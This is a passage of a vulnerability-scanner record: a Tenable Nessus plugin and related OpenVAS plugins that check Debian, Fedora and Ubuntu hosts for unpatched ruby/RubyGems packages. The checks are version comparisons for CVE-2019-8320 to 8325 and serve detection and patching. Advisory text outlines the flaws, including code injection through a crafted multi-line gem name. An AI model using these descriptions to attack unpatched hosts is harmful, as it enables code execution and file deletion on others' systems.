ID DEBIAN_DLA-1735.NASL Type nessus Reporter This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2019-04-01T00:00:00
Description
Several vulnerabilities have been discovered in rubygems embedded in
ruby2.1, the interpreted scripting language.
CVE-2019-8320
A Directory Traversal issue was discovered in RubyGems. Before making
new directories or touching files (which now include path-checking
code for symlinks), it would delete the target destination.
CVE-2019-8322
The gem owner command outputs the contents of the API response
directly to stdout. Therefore, if the response is crafted, escape
sequence injection may occur.
CVE-2019-8323
Gem::GemcutterUtilities#with_response may output the API response to
stdout as it is. Therefore, if the API side modifies the response,
escape sequence injection may occur.
CVE-2019-8324
A crafted gem with a multi-line name is not handled correctly.
Therefore, an attacker could inject arbitrary code to the stub line of
gemspec, which is eval-ed by code in ensure_loadable_spec during the
preinstall check.
CVE-2019-8325
An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since
Gem::CommandManager#run calls alert_error without escaping, escape
sequence injection is possible. (There are many ways to cause an
error.)
For Debian 8 'Jessie', these problems have been fixed in version
2.1.5-2+deb8u7.
We recommend that you upgrade your ruby2.1 packages.
NOTE: Tenable Network Security has extracted the preceding description
block directly from the DLA security advisory. Tenable has attempted
to automatically clean and format it as much as possible without
introducing additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Debian Security Advisory DLA-1735-1. The text
# itself is copyright (C) Software in the Public Interest, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(123522);
script_version("1.6");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/11");
script_cve_id("CVE-2019-8320", "CVE-2019-8322", "CVE-2019-8323", "CVE-2019-8324", "CVE-2019-8325");
script_name(english:"Debian DLA-1735-1 : ruby2.1 security update");
script_summary(english:"Checks dpkg output for the updated packages.");
script_set_attribute(
attribute:"synopsis",
value:"The remote Debian host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"Several vulnerabilities have been discovered in rubygems embedded in
ruby2.1, the interpreted scripting language.
CVE-2019-8320
A Directory Traversal issue was discovered in RubyGems. Before making
new directories or touching files (which now include path-checking
code for symlinks), it would delete the target destination.
CVE-2019-8322
The gem owner command outputs the contents of the API response
directly to stdout. Therefore, if the response is crafted, escape
sequence injection may occur.
CVE-2019-8323
Gem::GemcutterUtilities#with_response may output the API response to
stdout as it is. Therefore, if the API side modifies the response,
escape sequence injection may occur.
CVE-2019-8324
A crafted gem with a multi-line name is not handled correctly.
Therefore, an attacker could inject arbitrary code to the stub line of
gemspec, which is eval-ed by code in ensure_loadable_spec during the
preinstall check.
CVE-2019-8325
An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since
Gem::CommandManager#run calls alert_error without escaping, escape
sequence injection is possible. (There are many ways to cause an
error.)
For Debian 8 'Jessie', these problems have been fixed in version
2.1.5-2+deb8u7.
We recommend that you upgrade your ruby2.1 packages.
NOTE: Tenable Network Security has extracted the preceding description
block directly from the DLA security advisory. Tenable has attempted
to automatically clean and format it as much as possible without
introducing additional issues."
);
script_set_attribute(
attribute:"see_also",
value:"https://lists.debian.org/debian-lts-announce/2019/03/msg00037.html"
);
script_set_attribute(
attribute:"see_also",
value:"https://packages.debian.org/source/jessie/ruby2.1"
);
script_set_attribute(attribute:"solution", value:"Upgrade the affected packages.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2019-8320");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:libruby2.1");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:ruby2.1");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:ruby2.1-dev");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:ruby2.1-doc");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:ruby2.1-tcltk");
script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:8.0");
script_set_attribute(attribute:"vuln_publication_date", value:"2019/06/06");
script_set_attribute(attribute:"patch_publication_date", value:"2019/03/29");
script_set_attribute(attribute:"plugin_publication_date", value:"2019/04/01");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Debian Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
exit(0);
}
include("audit.inc");
include("debian_package.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
flag = 0;
if (deb_check(release:"8.0", prefix:"libruby2.1", reference:"2.1.5-2+deb8u7")) flag++;
if (deb_check(release:"8.0", prefix:"ruby2.1", reference:"2.1.5-2+deb8u7")) flag++;
if (deb_check(release:"8.0", prefix:"ruby2.1-dev", reference:"2.1.5-2+deb8u7")) flag++;
if (deb_check(release:"8.0", prefix:"ruby2.1-doc", reference:"2.1.5-2+deb8u7")) flag++;
if (deb_check(release:"8.0", prefix:"ruby2.1-tcltk", reference:"2.1.5-2+deb8u7")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
else security_hole(0);
exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
{"id": "DEBIAN_DLA-1735.NASL", "bulletinFamily": "scanner", "title": "Debian DLA-1735-1 : ruby2.1 security update", "description": "Several vulnerabilities have been discovered in rubygems embedded in\nruby2.1, the interpreted scripting language.\n\nCVE-2019-8320\n\nA Directory Traversal issue was discovered in RubyGems. Before making\nnew directories or touching files (which now include path-checking\ncode for symlinks), it would delete the target destination.\n\nCVE-2019-8322\n\nThe gem owner command outputs the contents of the API response\ndirectly to stdout. Therefore, if the response is crafted, escape\nsequence injection may occur.\n\nCVE-2019-8323\n\nGem::GemcutterUtilities#with_response may output the API response to\nstdout as it is. Therefore, if the API side modifies the response,\nescape sequence injection may occur.\n\nCVE-2019-8324\n\nA crafted gem with a multi-line name is not handled correctly.\nTherefore, an attacker could inject arbitrary code to the stub line of\ngemspec, which is eval-ed by code in ensure_loadable_spec during the\npreinstall check.\n\nCVE-2019-8325\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2. Since\nGem::CommandManager#run calls alert_error without escaping, escape\nsequence injection is possible. (There are many ways to cause an\nerror.)\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n2.1.5-2+deb8u7.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "published": "2019-04-01T00:00:00", "modified": "2019-04-01T00:00:00", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/123522", "reporter": "This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://lists.debian.org/debian-lts-announce/2019/03/msg00037.html", "https://packages.debian.org/source/jessie/ruby2.1"], "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "type": "nessus", "lastseen": "2021-01-12T09:40:32", "edition": 16, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310876000", "OPENVAS:1361412562311220191718", "OPENVAS:1361412562311220191597", "OPENVAS:1361412562310883057", "OPENVAS:1361412562310891796", "OPENVAS:1361412562310891735", "OPENVAS:1361412562311220191617", "OPENVAS:1361412562310704433", "OPENVAS:1361412562310843974", "OPENVAS:1361412562310876346"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4433-1:2DFCF", "DEBIAN:DLA-1796-1:B8D0E", "DEBIAN:DLA-2330-1:B8DE4", "DEBIAN:DLA-1735-1:A1848"]}, {"type": "cve", "idList": ["CVE-2019-8323", "CVE-2019-8325", "CVE-2019-8320", "CVE-2019-8322", "CVE-2019-8324"]}, {"type": "amazon", "idList": ["ALAS2-2019-1249", "ALAS-2019-1255"]}, {"type": "redhat", "idList": ["RHSA-2019:1235", "RHSA-2019:1148", "RHSA-2019:1972", "RHSA-2019:1429", "RHSA-2020:2769", "RHSA-2019:1151", "RHSA-2019:1150"]}, {"type": "ubuntu", "idList": ["USN-3945-1"]}, {"type": "freebsd", "idList": ["27B12D04-4722-11E9-8B7C-B5E01141761F"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:1269D3F2131B2758F6111555E51EA48A"]}, {"type": "fedora", "idList": ["FEDORA:1F47A611D253", "FEDORA:63D6A607603A"]}, {"type": "nessus", "idList": ["NEWSTART_CGSL_NS-SA-2019-0084_RUBY.NASL", "FEDORA_2019-FEAC6674B7.NASL", "FEDORA_2019-A155364F3C.NASL", "FREEBSD_PKG_27B12D04472211E98B7CB5E01141761F.NASL", "AL2_ALAS-2019-1249.NASL", "EULEROS_SA-2019-1597.NASL", "NEWSTART_CGSL_NS-SA-2019-0080_RUBY.NASL", "DEBIAN_DSA-4433.NASL", "SL_20190515_RUBY_ON_SL7_X.NASL", "ALA_ALAS-2019-1255.NASL"]}, {"type": "centos", "idList": ["CESA-2019:1235"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-1235", "ELSA-2019-1972", "ELSA-2019-2028"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1771-1"]}, {"type": "github", "idList": ["GHSA-5X32-C9MF-49CC", "GHSA-76WM-422Q-92MQ", "GHSA-4WM8-FJV7-J774", "GHSA-3H4R-PJV6-CPH9", "GHSA-MH37-8C3G-3FGC"]}, {"type": "hackerone", "idList": ["H1:317321"]}, {"type": "attackerkb", "idList": ["AKB:B2EBBF0E-24E2-4432-8E53-7E8A540D8917"]}], "modified": "2021-01-12T09:40:32", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-01-12T09:40:32", "rev": 2}, "vulnersScore": 7.3}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1735-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123522);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2019-8320\", \"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n\n script_name(english:\"Debian DLA-1735-1 : ruby2.1 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in rubygems embedded in\nruby2.1, the interpreted scripting language.\n\nCVE-2019-8320\n\nA Directory Traversal issue was discovered in RubyGems. Before making\nnew directories or touching files (which now include path-checking\ncode for symlinks), it would delete the target destination.\n\nCVE-2019-8322\n\nThe gem owner command outputs the contents of the API response\ndirectly to stdout. Therefore, if the response is crafted, escape\nsequence injection may occur.\n\nCVE-2019-8323\n\nGem::GemcutterUtilities#with_response may output the API response to\nstdout as it is. Therefore, if the API side modifies the response,\nescape sequence injection may occur.\n\nCVE-2019-8324\n\nA crafted gem with a multi-line name is not handled correctly.\nTherefore, an attacker could inject arbitrary code to the stub line of\ngemspec, which is eval-ed by code in ensure_loadable_spec during the\npreinstall check.\n\nCVE-2019-8325\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2. Since\nGem::CommandManager#run calls alert_error without escaping, escape\nsequence injection is possible. (There are many ways to cause an\nerror.)\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n2.1.5-2+deb8u7.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2019/03/msg00037.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/ruby2.1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8320\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby2.1-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libruby2.1\", reference:\"2.1.5-2+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1\", reference:\"2.1.5-2+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-dev\", reference:\"2.1.5-2+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-doc\", reference:\"2.1.5-2+deb8u7\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ruby2.1-tcltk\", reference:\"2.1.5-2+deb8u7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "pluginID": "123522", "cpe": ["p-cpe:/a:debian:debian_linux:ruby2.1", "cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:ruby2.1-tcltk", "p-cpe:/a:debian:debian_linux:ruby2.1-doc", "p-cpe:/a:debian:debian_linux:libruby2.1", "p-cpe:/a:debian:debian_linux:ruby2.1-dev"], "scheme": null, "cvss3": {"score": 7.4, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H"}}
{"openvas": [{"lastseen": "2020-01-29T19:24:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "The remote host is missing an update for the ", "modified": "2020-01-29T00:00:00", "published": "2019-04-02T00:00:00", "id": "OPENVAS:1361412562310891735", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891735", "type": "openvas", "title": "Debian LTS: Security Advisory for ruby2.1 (DLA-1735-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891735\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2019-8320\", \"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_tag(name:\"cvss_base\", value:\"8.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-04-02 20:00:00 +0000 (Tue, 02 Apr 2019)\");\n script_name(\"Debian LTS: Security Advisory for ruby2.1 (DLA-1735-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/03/msg00037.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1735-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby2.1'\n package(s) announced via the DLA-1735-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been discovered in rubygems embedded in\nruby2.1, the interpreted scripting language.\n\nCVE-2019-8320\n\nA Directory Traversal issue was discovered in RubyGems. Before\nmaking new directories or touching files (which now include\npath-checking code for symlinks), it would delete the target\ndestination.\n\nCVE-2019-8322\n\nThe gem owner command outputs the contents of the API response\ndirectly to stdout. Therefore, if the response is crafted, escape\nsequence injection may occur.\n\nCVE-2019-8323\n\nGem::GemcutterUtilities#with_response may output the API response to\nstdout as it is. Therefore, if the API side modifies the response,\nescape sequence injection may occur.\n\nCVE-2019-8324\n\nA crafted gem with a multi-line name is not handled correctly.\nTherefore, an attacker could inject arbitrary code to the stub line\nof gemspec, which is eval-ed by code in ensure_loadable_spec during\nthe preinstall check.\n\nCVE-2019-8325\n\nAn issue was discovered in RubyGems 2.6 and later through 3.0.2.\nSince Gem::CommandManager#run calls alert_error without escaping,\nescape sequence injection is possible. (There are many ways to cause\nan error.)\");\n\n script_tag(name:\"affected\", value:\"'ruby2.1' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n2.1.5-2+deb8u7.\n\nWe recommend that you upgrade your ruby2.1 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libruby2.1\", ver:\"2.1.5-2+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1\", ver:\"2.1.5-2+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-dev\", ver:\"2.1.5-2+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-doc\", ver:\"2.1.5-2+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-tcltk\", ver:\"2.1.5-2+deb8u7\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2019-06-21T14:42:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "The remote host is missing an update for the ", "modified": "2019-06-21T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310876000", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876000", "type": "openvas", "title": "Fedora Update for ruby FEDORA-2019-a155364f3c", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876000\");\n script_version(\"2019-06-21T07:26:45+0000\");\n script_cve_id(\"CVE-2019-8320\", \"CVE-2019-8321\", \"CVE-2019-8322\", \"CVE-2019-8323\", \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_tag(name:\"cvss_base\", value:\"8.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-06-21 07:26:45 +0000 (Fri, 21 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:31:07 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for ruby FEDORA-2019-a155364f3c\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-a155364f3c\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V3V4CAKK4UMS7K7U653RJ4XBOM4CFP7O\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby'\n package(s) announced via the FEDORA-2019-a155364f3c advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Ruby is the interpreted scripting language for quick and easy\nobject-oriented programming. It has many features to process text\nfiles and to do system management tasks (as in Perl). It is simple,\nstraight-forward, and extensible.\");\n\n script_tag(name:\"affected\", value:\"'ruby' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~2.5.5~101.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2019-06-21T14:43:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-8320", "CVE-2019-8325", "CVE-2019-8321", "CVE-2019-8323", "CVE-2019-8322", "CVE-2019-8324"], "description": "The remote host is missing an update for the\n ", "modified": "2019-06-21T00:00:00", "published": "2019-04-12T00:00:00", "id": "OPENVAS:1361412562310843974", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843974", "type": "openvas", "title": "Ubuntu Update for ruby2.5 USN-3945-1", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843974\");\n script_version(\"2019-06-21T07:26:45+0000\");\n script_cve_id(\"CVE-2019-8320\", \"CVE-2019-8321\", \"CVE-2019-8322\", \"CVE-2019-8323\",\n \"CVE-2019-8324\", \"CVE-2019-8325\");\n script_tag(name:\"cvss_base\", value:\"8.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-06-21 07:26:45 +0000 (Fri, 21 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-12 02:00:22 +0000 (Fri, 12 Apr 2019)\");\n script_name(\"Ubuntu Update for ruby2.5 USN-3945-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=(UBUNTU14\\.04 LTS|UBUNTU18\\.04 LTS|UBUNTU18\\.10|UBUNTU16\\.04 LTS)\");\n\n script_xref(name:\"USN\", value:\"3945-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3945-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'ruby2.5' package(s) announced via the USN-3945-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version\n is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that Ruby incorrectly\nhandled certain RubyGems.\nAn attacker could possibly use this issue to execute arbitrary\ncommands. (CVE-2019-8320)\n\nIt was discovered that Ruby incorrectly handled certain inputs.\nAn attacker could possibly use this issue to execute arbitrary code.\n(CVE-2019-8321, CVE-2019-8322, CVE-2019-8323, CVE-2019-8324, CVE-2019-8325)\");\n\n script_tag(name:\"affected\", value:\"'ruby2.5' package(s) on Ubuntu 18.10, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS, Ubuntu 14.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU14.04 LTS\") {\n\n if(!isnull(res = 